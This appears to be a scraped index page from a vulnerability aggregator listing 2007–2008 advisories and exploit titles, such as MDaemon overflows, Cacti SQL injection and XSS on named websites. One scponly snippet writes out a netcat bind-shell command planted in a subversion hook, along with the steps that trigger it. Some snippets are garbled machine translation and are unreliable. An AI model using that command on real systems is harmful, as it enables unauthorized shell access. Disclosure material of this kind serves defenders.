Unfixed Redirect vulnerability at lamp.lucepedia.com
Security researcher holisticinfosec submitted on 29/06/2008 a Redirect vulnerability affecting lamp.lucepedia.com, which at the time of submission ranked 416584 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 07/11/2008. It is currently...
MDaemon <= 9.6.5 Multiple Remote Buffer Overflow Exploit PoC
Exploit for unknown platform in category dos /...
Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)
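cbrPager is a viewer for cbr and cbz (comic book archive) files, written in C. cbrpager does not properly sanitize the file names of image files before it calls the internal extraction tools unrar and unzip through the system() function; if a user is tricked into opening a .zip or .rar archive containing specially crafted file names, arbitrary commands may be executed with the privileges of the current user. John Coppens cbrPager < 0.9.17 John Coppens The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:...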
Smeego CMS Local File Include Exploit by 0in from Dark-Coders Programming & Security Group (http://dark-coders.4rh.eu) Contact: 0in(dot)email[at]gmail(dot...
Smeego 1.0 (Cookie lang) Local File Inclusion Exploit
Exploit for unknown platform in category web...
Zen Cart 2008 - index.php?keyword Cross-Site Scripting
Cacti 0.8.7a Multiple Vulnerabilities
Cacti 0.8.7a Multiple Vulnerabilities. Name: Multiple Vulnerabilities in Cacti; Systems Affected: Cacti 0.8.7a and possibly earlier versions; Severity: High; Impact (CVSSv2): High (9/10, vector: AV:N/AC:L/Au:N/C:C/I:P/A:P); Vendor: http://www.cacti.net/ ...
Cacti 0.8.7 - graph_view.php?graph_list SQL Injection
Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BOF Exploit
No description provided by...
Yahoo! JukeBox MediaGrid ActiveX mediagrid.dll AddBitmap() BOF Exploit
Exploit for unknown platform in category remote...
Yahoo! JukeBox MediaGrid - AddBitmap() ActiveX Buffer Overflow
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
No description provided by...
Macrovision FlexNet isusweb.dll DownloadAndExecute Method Exploit
Exploit for unknown platform in category remote...
Macrovision FlexNet - isusweb.dll DownloadAndExecute Method
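scponly is a replacement shell that lets accounts perform scp and sftp operations without needing shell access. scponly has a design flaw that a local attacker can exploit to bypass security restrictions and execute arbitrary commands. By locally creating a /tmp/blubb subversion repository whose /tmp/blubb/hooks/post-commit contains the command ( nc -l -p 1042 -e /bin/bash) &, copying the repository with scp -r /tmp/blubb/ user@host:, and then checking out the repository remotely: ssh user@host /usr/bin/svn co file:///home/user/blubb...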
Thomson SpeedTouch 716 - URL Cross-Site Scripting
SEC Consult SA-20071101-0 :: Multiple Vulnerabilities in SonicWALL SSL-VPN Client
SEC Consult Security Advisory < 20071101-0 > title: Multiple vulnerabilities in SonicWALL SSL-VPN Client * Deletion of arbitrary files on the client * Arbitrary code execution thru various buffer overflows program:...
SonicWALL SSL VPN 1.3 3 WebCacheCleaner - ActiveX FileDelete Method Traversal Arbitrary File...
Analysis of Ronin article system V2.3 - vulnerability warning - the black bar safety net
Author: ice of origin Description: articles have been published in hackers manual 0 7 year 1 1 period, reproduced please specify the source of! Own just to learn ASP, Hey, no one taught, really cool! It does not, see for yourself a few books, and non-security on each issue analysis of ASP...
PHP as a server side scripting language, like writing a simple, or a complex dynamic web page such a task, it is fully able to do the job. But the thing is not always the case, sometimes in order to achieve a certain function, it must be by means of the operating system of the external program, or...
Unfixed XSS vulnerability at www.marthastewart.com
Security researcher Johnjuan728 submitted on 21/09/2007 a cross-site-scripting (XSS) vulnerability affecting www.marthastewart.com, which at the time of submission ranked 8852 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 24/09/2007. It...
Calyptix Security Advisory CX-2007-05 - eSoft InstaGate EX2 Cross-Site Request Forgery Attack
Calyptix Security Advisory CX-2007-05 eSoft InstaGate EX2 Cross-Site Request Forgery Attack Date: 07/11/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-05.php http://labs.calyptix.com/CX-2007-05.txt [ Overview ] Multiple versions of eSoft's InstaGate EX2 UTM device are vulnerable to....
Calyptix Security Advisory CX-2007-04 Cross-Site Request Forgery Attack Against Check Point Safe@Office Device Date: 06/26/2007 http://www.calyptix.com/ http://labs.calyptix.com/CX-2007-04.php http://labs.calyptix.com/CX-2007-04.txt [ Overview ] Multiple versions of Check Point's Safe@Office UTM...
GD Graphics Library 2.0.34 - libgd gdImageCreateXbm Function Unspecified Denial of Service
Unfixed XSS vulnerability at www.visitcharlotte.com
Security researcher MaXWeL submitted on 27/05/2007 a cross-site-scripting (XSS) vulnerability affecting www.visitcharlotte.com, which at the time of submission ranked 362747 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 30/05/2007. It is.....
See online article, turn it down collection. PHP as a server side scripting language, like writing a simple, or a complex dynamic web page such a task, it is fully able to do the job. But the thing is not always the case, sometimes in order to achieve a certain function, it must be by means of...